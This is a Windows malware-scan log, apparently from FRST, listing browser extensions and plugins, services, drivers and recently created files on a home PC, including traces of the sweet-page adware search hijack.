Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)
Handler: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\Trend Micro\AMSP\Module\20002\6.6.1010\6.6.1010\TmBpIe32.dll [2011-03-25] (Trend Micro Inc.)
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files\Trend Micro\AMSP\Module\20004\1.5.1504\6.6.1088\TmIEPlg.dll [2010-07-20] (Trend Micro Inc.)

FireFox:
========
FF DefaultProfile: pgyttybc._
FF ProfilePath: C:\Users\violeta\AppData\Roaming\Mozilla\Firefox\Profiles\pgyttybc._ [2016-10-17]
FF Extension: (Skype Click to Call) - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A} [2016-09-24] [not signed]
FF Extension: (Skype) - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-05-25]
FF HKLM\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext => not found
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Users\violeta\AppData\Roaming\okitspace\Firefox => not found
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\WebexpEnhancedV1\WebexpEnhancedV1alpha842\ff => not found
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\VideoPlayerV3\VideoPlayerV3beta322\ff => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_23_0_0_185.dll [2016-10-15] ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw_1213153.dll [2014-06-24] (Adobe Systems, Inc.)
FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2012-07-31] (Foxit Corporation)
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll [2015-05-21] (Google)
FF Plugin: @java.com/DTPlugin,version=11.91.2 -> C:\Program Files\Java\jre1.8.0_91\bin\dtplugin\npDeployJava1.dll [2016-07-11] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.91.2 -> C:\Program Files\Java\jre1.8.0_91\bin\plugin2\npjp2.dll [2016-07-11] (Oracle Corporation)
FF Plugin: @live.heroesandgenerals.com/npretox -> C:\Program Files\Heroes & Generals\live\npretox-1.0.6.1\npretoxlive-1.0.6.1.dll [2015-05-05] (Reto-Moto ApS)
FF Plugin: @mcafee.com/McAfeeMssPlugin -> C:\Program Files\McAfee Security Scan\3.8.141\npMcAfeeMss.dll [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=16.4.3503.0728 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2012-07-28] (Microsoft Corporation)
FF Plugin: @nexon.net/NxGame -> C:\ProgramData\NexonUS\NGM\npNxGameUS.dll [2013-02-05] (Nexon)
FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
FF Plugin: @real.com/nppl3260;version=16.0.2.32 -> C:\Program Files\Real\RealPlayer\Netscape6\nppl3260.dll [No File]
FF Plugin: @real.com/nprpplugin;version=16.0.2.32 -> C:\Program Files\Real\RealPlayer\Netscape6\nprpplugin.dll [No File]
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin HKU\S-1-5-21-3268508096-794200350-1188608446-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\violeta\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2016-07-14] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-3268508096-794200350-1188608446-1000: pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
FF Plugin HKU\S-1-5-21-3268508096-794200350-1188608446-1000: thehappycloud.com/HappyCloudPlugin -> C:\ProgramData\HappyCloud\Application\npHappyCloudPlugin.dll [2013-11-17] (The Happy Cloud)
FF Plugin HKU\S-1-5-21-3268508096-794200350-1188608446-1000: ubisoft.com/uplaypc -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [2016-09-06] ()
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppl3260.dll [2013-08-15] (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nprpplugin.dll [2013-08-15] (RealPlayer)

Chrome:
=======
CHR DefaultProfile: Profile 1
CHR HomePage: Profile 1 -> hxxps://www.google.rs/
CHR StartupUrls: Profile 1 -> "hxxp://www.google.com/","hxxp://www.sweet-page.com/?type=hp&ts=1434546381&z=ebb035f865ef946d91753c5g9z0c1zcw1zeq9c6bbz&from=cor&uid=WDCXWD5000AVVS-63H0B1_WD-WCAUK094765147651","hxxps://www.google.rs/"
CHR DefaultSearchURL: Profile 1 -> hxxp://www.sweet-page.com/web/?type=ds&ts=1434546381&z=ebb035f865ef946d91753c5g9z0c1zcw1zeq9c6bbz&from=cor&uid=WDCXWD5000AVVS-63H0B1_WD-WCAUK094765147651&q={searchTerms}
CHR DefaultSearchKeyword: Profile 1 -> sweet-page
CHR Session Restore: Profile 1 -> is enabled.
CHR Profile: C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1 [2016-09-11]
CHR Extension: (Google диск) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-01]
CHR Extension: (YouTube) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-02]
CHR Extension: (Google Search) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-01]
CHR Extension: (Google документи офлајн) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-12-12]
CHR Extension: (Плаћања у Chrome веб-продавници) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-08-11]
CHR Extension: (Gmail) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-18]
CHR HKU\S-1-5-21-3268508096-794200350-1188608446-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bhnddlaigdpagceekbpkajlgbnjbabig] - C:\Users\violeta\AppData\Local\CRE\bhnddlaigdpagceekbpkajlgbnjbabig.crx <not found>

Opera:
=======
OPR Extension: (Jungle Net) - C:\Users\violeta\AppData\Roaming\Opera Software\Opera Stable\Extensions\iffnkklnhcckdbakeemklgkangigdbbk [2015-06-17]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 c2cautoupdatesvc; C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1364096 2016-05-25] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1687680 2016-05-25] (Microsoft Corporation)
S3 c2wts; C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe [15768 2010-02-03] (Microsoft Corporation)
S3 EvoSvc; C:\Program Files\Echobit\Evolve\EvoSvc.exe [1583488 2015-08-18] (Echobit LLC)
S3 fussvc; C:\Program Files\Windows Kits\8.1\App Certification Kit\fussvc.exe [140800 2014-02-19] (Microsoft Corporation) [File not signed]
R2 Hamachi2Svc; C:\Program Files\LogMeIn Hamachi\hamachi-2.exe [1958408 2016-09-13] (LogMeIn Inc.)
U2 HiPatchService; C:\Program Files\Hi-Rez Studios\HiPatchService.exe [9728 2016-10-10] (Hi-Rez Studios) [File not signed]
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
R2 IpOverUsbSvc; C:\Program Files\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [22768 2014-04-17] (Microsoft Corporation)
R2 LMIGuardianSvc; C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe [405424 2016-08-31] (LogMeIn, Inc.)
S3 npggsvc; C:\Windows\system32\GameMon.des [5560840 2016-05-11] (INCA Internet Co., Ltd.)
S3 Origin Client Service; C:\Program Files\Origin\OriginClientService.exe [2142728 2016-10-11] (Electronic Arts)
S2 Origin Web Helper Service; C:\Program Files\Origin\OriginWebHelperService.exe [2209296 2016-10-11] (Electronic Arts)
S3 OverwolfUpdater; C:\Program Files\Overwolf\OverwolfUpdater.exe [1310448 2016-08-29] (Overwolf LTD)
R2 PnkBstrA; C:\Windows\system32\PnkBstrA.exe [76888 2012-11-03] ()
R2 Razer Game Scanner Service; C:\Program Files\Razer\Razer Services\GSS\GameScannerService.exe [188072 2015-08-15] ()
R2 RzKLService; C:\Program Files\Razer\Razer Cortex\RzKLService.exe [129168 2015-08-31] (Razer Inc.)
R2 sesvc; C:\Program Files\ShadowExplorer\sesvc.exe [9216 2013-01-02] (ShadowExplorer.com - About) [File not signed]
S2 Skype C2C Service; C:\ProgramData\Skype\Toolbars\Skype C2C Service\c2c_service.exe [3048136 2012-05-30] () [File not signed]
R2 StarWindServiceAE; C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe [275968 2007-05-28] (Rocket Division Software) [File not signed]
S3 Te.Service; C:\Program Files\Windows Kits\8.1\Testing\Runtimes\TAEF\Wex.Services.exe [91136 2013-08-21] (Microsoft Corporation) [File not signed]
R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [6889232 2015-12-14] (TeamViewer GmbH)
S2 Telenor Internet. RunOuc; C:\Program Files\Telenor Internet\UpdateDog\ouc.exe [246112 2011-12-19] ()
R2 TunnelBearMaintenance; C:\Program Files\TunnelBear\TBear.Maintenance.exe [41472 2016-05-11] ()
S3 VsEtwService120; C:\Program Files\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe [73360 2014-07-23] (Microsoft Corporation)
S3 VSStandardCollectorService140; C:\Program Files\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [48872 2016-03-22] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Corporation)
S2 Amsp; "C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe" coreFrameworkHost.exe -m=rb -dt=60000 [X]
S2 HWDeviceService.exe; "C:\ProgramData\DatacardService\HWDeviceService.exe" -/service [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BroadcomWModem; C:\Windows\System32\DRIVERS\bcmww.sys [118400 2005-06-02] (Broadcom Corporation)
R3 EvolveVirtualAdapter; C:\Windows\System32\DRIVERS\evolve.sys [18584 2013-06-12] (Echobit, LLC)
R3 hamachi; C:\Windows\System32\DRIVERS\hamachi.sys [27040 2015-11-12] (LogMeIn, Inc.)
R2 IntelHaxm; C:\Windows\System32\DRIVERS\IntelHaxm.sys [78848 2015-01-30] (Intel Corporation)
R1 ISODrive; C:\Program Files\UltraISO\drivers\ISODrive.sys [82320 2010-01-29] (EZB Systems, Inc.)
S3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [22856 2013-04-04] (Malwarebytes Corporation)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [20288 2015-06-12] (Razer, Inc.)
S4 secdrv; C:\Windows\system32\Drivers\secdrv.sys [12528 2015-11-07] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) [File not signed]
S0 sfdrv01; C:\Windows\System32\drivers\sfdrv01.sys [50176 2005-05-17] (Protection Technology) [File not signed]
R0 sfhlp02; C:\Windows\System32\drivers\sfhlp02.sys [6656 2005-05-16] (Protection Technology) [File not signed]
S0 sfsync02; C:\Windows\System32\drivers\sfsync02.sys [19968 2005-05-16] (Protection Technology) [File not signed]
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [721904 2013-07-31] () [File not signed]
R3 tap-tb-0901; C:\Windows\System32\DRIVERS\tap-tb-0901.sys [33280 2015-08-10] (The OpenVPN Project)
R3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [26624 2011-12-15] (The OpenVPN Project)
R2 tmactmon; C:\Windows\System32\DRIVERS\tmactmon.sys [80464 2012-01-06] (Trend Micro Inc.)
R2 tmcomm; C:\Windows\System32\DRIVERS\tmcomm.sys [189520 2012-01-06] (Trend Micro Inc.)
R2 tmevtmgr; C:\Windows\System32\DRIVERS\tmevtmgr.sys [64080 2012-01-06] (Trend Micro Inc.)
R1 tmtdi; C:\Windows\System32\DRIVERS\tmtdi.sys [92112 2012-01-06] (Trend Micro Inc.)
R3 XSplit_Dummy; C:\Windows\System32\drivers\xspltspk.sys [22104 2014-07-02] (SplitmediaLabs Limited)
R3 zttap200; C:\Windows\System32\DRIVERS\zttap200.sys [28824 2014-03-05] ()
U3 ai0cxrxm; C:\Windows\system32\Drivers\ai0cxrxm.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
S3 EagleXNt; \??\C:\Windows\system32\drivers\EagleXNt.sys [X]
S3 ewusbnet; system32\DRIVERS\ewusbnet.sys [X]
S3 hwusbdev; system32\DRIVERS\ewusbdev.sys [X]
U0 Partizan; system32\drivers\Partizan.sys [X]
S3 TuneUpUtilitiesDrv; \??\C:\Program Files\TuneUp Utilities 2013\TuneUpUtilitiesDriver32.sys [X]
S3 vtany; \??\C:\Windows\vtany.sys [X]
S3 XDva397; \??\C:\Windows\system32\XDva397.sys [X]
S3 XDva410; \??\C:\Windows\system32\XDva410.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-17 06:40 - 2016-10-17 06:43 - 00024810 _____ C:\Users\violeta\Desktop\FRST.txt
2016-10-17 06:39 - 2016-10-17 06:39 - 00000000 ____D C:\Users\violeta\Desktop\FRST-OlderVersion
2016-10-16 10:09 - 2016-10-16 10:09 - 00000000 ____D C:\Users\violeta\AppData\Roaming\com.cardsandcastles.game.steam
2016-10-16 10:08 - 2016-10-16 10:08 - 00000216 _____ C:\Users\violeta\Desktop\Cards and Castles.url
2016-10-14 22:10 - 2016-10-17 06:39 - 01756672 _____ (Farbar) C:\Users\violeta\Desktop\FRST.exe
2016-10-14 22:10 - 2016-10-14 22:30 - 00000000 ____D C:\FRST
2016-10-14 22:10 - 2016-10-14 22:10 - 00468480 _____ () C:\Users\violeta\Desktop\CKScanner.exe
2016-10-14 21:52 - 2016-10-14 21:52 - 03874368 _____ C:\Users\violeta\Downloads\AdwCleaner.exe
2016-10-14 14:30 - 2016-10-14 14:30 - 00000000 ____D C:\Users\violeta\AppData\Local\ElevatedDiagnostics
2016-10-13 16:48 - 2016-10-13 16:48 - 00688992 ____R (Swearware) C:\Users\violeta\Desktop\dds.scr
2016-10-13 16:46 - 2016-10-13 16:48 - 00000032 _____ C:\Users\violeta\Desktop\programi deinstalirani.txt
2016-10-13 13:51 - 2016-10-13 14:16 - 00000996 _____ C:\Users\Public\Desktop\Unity 5.4.2f1 (32-bit).lnk
2016-10-13 13:51 - 2016-10-13 13:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Unity 5.4.2f1 (32-bit)
2016-10-13 13:33 - 2016-10-13 13:33 - 00718392 _____ C:\Users\violeta\Downloads\UnityDownloadAssistant-5.4.2f1.exe
2016-10-12 21:15 - 2016-10-12 21:15 - 00000000 ____D C:\Users\violeta\Desktop\voice tcg tester_Data
2016-10-12 15:31 - 2016-10-12 15:31 - 00000121 _____ C:\Users\violeta\Desktop\trollrt.txt
2016-10-12 15:13 - 2016-10-12 15:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightshot
2016-10-12 15:13 - 2016-10-12 15:13 - 00000000 ____D C:\Program Files\Skillbrains
2016-10-12 15:12 - 2016-10-12 15:12 - 02551888 _____ (Skillbrains ) C:\Users\violeta\Downloads\setup-lightshot.exe
2016-10-12 13:56 - 2016-09-30 17:20 - 04000488 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2016-10-12 13:56 - 2016-09-30 17:20 - 03944680 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-10-12 13:56 - 2016-09-30 07:47 - 20306944 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-10-12 13:56 - 2016-09-30 07:42 - 00498688 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-10-12 13:56 - 2016-09-30 07:38 - 02286592 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-10-12 13:56 - 2016-09-30 07:12 - 04608512 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-10-12 13:56 - 2016-09-30 07:05 - 00693248 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-10-12 13:56 - 2016-09-30 07:03 - 13653504 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-10-12 13:56 - 2016-09-30 06:46 - 02444288 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-10-12 13:56 - 2016-09-30 06:43 - 01312768 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-10-12 13:56 - 2016-09-15 17:15 - 00741888 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-10-12 13:56 - 2016-09-12 22:54 - 00067816 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-10-12 13:56 - 2016-09-12 22:49 - 01063936 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-10-12 13:56 - 2016-09-12 22:49 - 01017856 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-10-12 13:56 - 2016-09-12 21:08 - 01251328 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2016-10-12 13:56 - 2016-09-12 21:08 - 00909824 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2016-10-12 13:56 - 2016-09-10 17:53 - 02291712 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll
2016-10-12 13:56 - 2016-09-09 17:53 - 01406976 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-10-12 13:56 - 2016-09-09 17:53 - 00488448 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-10-12 13:56 - 2016-09-09 17:53 - 00478208 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-10-12 13:56 - 2016-09-09 17:53 - 00268800 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-10-12 13:56 - 2016-09-09 17:53 - 00213504 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2016-10-12 13:56 - 2016-09-09 17:53 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-10-12 13:56 - 2016-09-09 17:53 - 00107008 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-10-12 13:56 - 2016-09-08 16:49 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2016-10-12 13:56 - 2016-08-16 22:27 - 00259072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys
2016-10-12 13:56 - 2016-08-16 22:27 - 00076288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbccgp.sys
2016-10-12 13:56 - 2016-08-16 22:26 - 00285696 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2016-10-12 13:56 - 2016-08-16 22:26 - 00046592 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys
2016-10-12 13:56 - 2016-08-16 22:26 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys
2016-10-12 13:56 - 2016-08-16 22:26 - 00020480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbohci.sys
2016-10-12 13:56 - 2016-08-16 22:26 - 00006016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys
2016-10-12 13:56 - 2016-08-12 18:47 - 12574208 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2016-10-12 13:56 - 2016-08-12 18:47 - 11410432 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2016-10-12 13:56 - 2016-08-12 18:21 - 00437248 _____ (Microsoft Corporation) C:\Windows\system32\scavengeui.dll
2016-10-12 13:56 - 2016-08-06 17:15 - 01178112 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2016-10-12 13:56 - 2016-08-06 17:15 - 00249344 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2016-10-12 13:56 - 2016-08-06 17:15 - 00214016 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2016-10-12 13:56 - 2016-08-06 17:15 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2016-10-12 13:56 - 2016-08-06 16:53 - 00199168 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2016-10-12 13:56 - 2016-07-22 16:51 - 00123904 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2016-10-12 13:56 - 2016-06-14 17:25 - 00078568 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys
2016-10-12 13:56 - 2016-06-14 17:21 - 03209216 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 01329664 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 01005056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00744960 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00519680 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00474624 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00442368 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00406016 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00354816 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00275968 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00195072 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00157184 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00080896 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2016-10-12 13:56 - 2016-06-14 17:17 - 00593920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2016-10-12 13:55 - 2016-09-30 21:28 - 00346312 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-10-12 13:55 - 2016-09-30 07:54 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-10-12 13:55 - 2016-09-30 07:54 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2016-10-12 13:55 - 2016-09-30 07:42 - 00341504 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-10-12 13:55 - 2016-09-30 07:42 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2016-10-12 13:55 - 2016-09-30 07:42 - 00047616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2016-10-12 13:55 - 2016-09-30 07:41 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2016-10-12 13:55 - 2016-09-30 07:36 - 00047104 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-10-12 13:55 - 2016-09-30 07:35 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2016-10-12 13:55 - 2016-09-30 07:33 - 00476160 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-10-12 13:55 - 2016-09-30 07:32 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-10-12 13:55 - 2016-09-30 07:32 - 00620032 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-10-12 13:55 - 2016-09-30 07:32 - 00115712 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-10-12 13:55 - 2016-09-30 07:32 - 00102912 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2016-10-12 13:55 - 2016-09-30 07:27 - 00667648 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2016-10-12 13:55 - 2016-09-30 07:24 - 00416256 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-10-12 13:55 - 2016-09-30 07:19 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2016-10-12 13:55 - 2016-09-30 07:19 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2016-10-12 13:55 - 2016-09-30 07:17 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2016-10-12 13:55 - 2016-09-30 07:15 - 00076288 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-10-12 13:55 - 2016-09-30 07:14 - 00279040 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-10-12 13:55 - 2016-09-30 07:13 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2016-10-12 13:55 - 2016-09-30 07:07 - 00230400 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-10-12 13:55 - 2016-09-30 07:05 - 02055680 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-10-12 13:55 - 2016-09-30 07:05 - 01155072 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2016-10-12 13:55 - 2016-09-30 07:05 - 00689152 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-10-12 13:55 - 2016-09-30 06:42 - 00710144 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-10-12 13:55 - 2016-09-15 17:15 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2016-10-12 13:55 - 2016-09-12 22:53 - 00137960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-10-12 13:55 - 2016-09-12 22:53 - 00067304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-10-12 13:55 - 2016-09-12 22:49 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00655360 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00553472 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00260608 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00254464 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00172032 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
